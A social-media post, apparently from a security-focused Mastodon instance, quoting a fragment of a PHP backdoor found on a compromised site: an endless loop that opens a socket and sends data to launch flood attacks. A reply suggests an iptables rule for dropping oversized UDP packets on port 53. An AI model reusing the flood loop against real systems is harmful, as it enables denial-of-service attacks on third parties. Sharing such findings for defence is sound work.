Follow

A PHP backdoor on a compromised site being used to start attacks:

while(true)
{
$fp=fsockopen($trh2,$trp,$aaa1,$aaa2,1);
fwrite($fp,$spdat);
}

noc.org/articles/php-backdoor-

· · Web · 1 · 2 · 4

@dcid interesting that port 53 is hardcoded. I vaguely remember using a rule like:

# iptables -A FORWARD -p udp --dport 53 -m length --length 512: -j DROP

(i.e block UDP packets > 512 bytes on port 53)

Sign in to participate in the conversation
Noc.Social

Open Source Social Network. Focused on technology, networking, linux, privacy and security, but open to anyone. Civil discourse, polite and open. Managed by the noc.org team.